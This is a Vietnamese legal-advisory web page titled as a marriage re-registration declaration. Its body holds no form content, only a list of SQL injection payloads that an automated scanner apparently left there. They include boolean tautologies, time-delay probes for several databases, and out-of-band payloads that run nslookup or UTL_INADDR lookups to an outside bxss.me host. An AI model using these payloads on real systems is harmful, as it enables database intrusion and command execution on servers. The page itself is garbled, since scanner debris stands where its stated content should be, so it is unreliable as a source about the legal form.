Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí lại việc kết hôn

Cập nhật lần cuối lúc 16:25 ngày 15/07/2013

Nguồn: vinalaf.com.vn
1
1
1
1
-1 OR 2+267-267-1=0+0+0+1 --
-1 OR 3+267-267-1=0+0+0+1 --
-1 OR 3*2<(0+5+267-267) --
1'"
-1 OR 3*2>(0+5+267-267) --
-1 OR 2+414-414-1=0+0+0+1
-1 OR 3+414-414-1=0+0+0+1
-1 OR 3*2<(0+5+414-414)
-1 OR 3*2>(0+5+414-414)
\
-1' OR 2+998-998-1=0+0+0+1 --
1
@@ExYzW
-1' OR 3+998-998-1=0+0+0+1 --
-1' OR 3*2<(0+5+998-998) --
JyI=
-1' OR 3*2>(0+5+998-998) --
-1' OR 2+549-549-1=0+0+0+1 or 'SCep0s1D'='
-1' OR 3+549-549-1=0+0+0+1 or 'SCep0s1D'='
-1' OR 3*2<(0+5+549-549) or 'SCep0s1D'='
-1' OR 3*2>(0+5+549-549) or 'SCep0s1D'='
-1" OR 2+816-816-1=0+0+0+1 --
-1" OR 3+816-816-1=0+0+0+1 --
-1" OR 3*2<(0+5+816-816) --
-1" OR 3*2>(0+5+816-816) --
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
-1; waitfor delay '0:0:6' --
-1); waitfor delay '0:0:6' --
1 waitfor delay '0:0:9' --
34gKfH8W'; waitfor delay '0:0:3' --
wGH9tMXm'; waitfor delay '0:0:0' --
-1;select pg_sleep(6); --
-1);select pg_sleep(6); --
-1));select pg_sleep(6); --
HVomUWK5';select pg_sleep(9); --
wJJV6z4C');select pg_sleep(9); --
LqjeHEt2');select pg_sleep(6); --
uwZxQ1nY'));select pg_sleep(3); --
B3NCGiB7'));select pg_sleep(9); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6058.34060.a0b57.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6060.34060.a0b57.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6061.34060.a0b57.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6062.34060.a0b57.\1.bxss.me
295'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: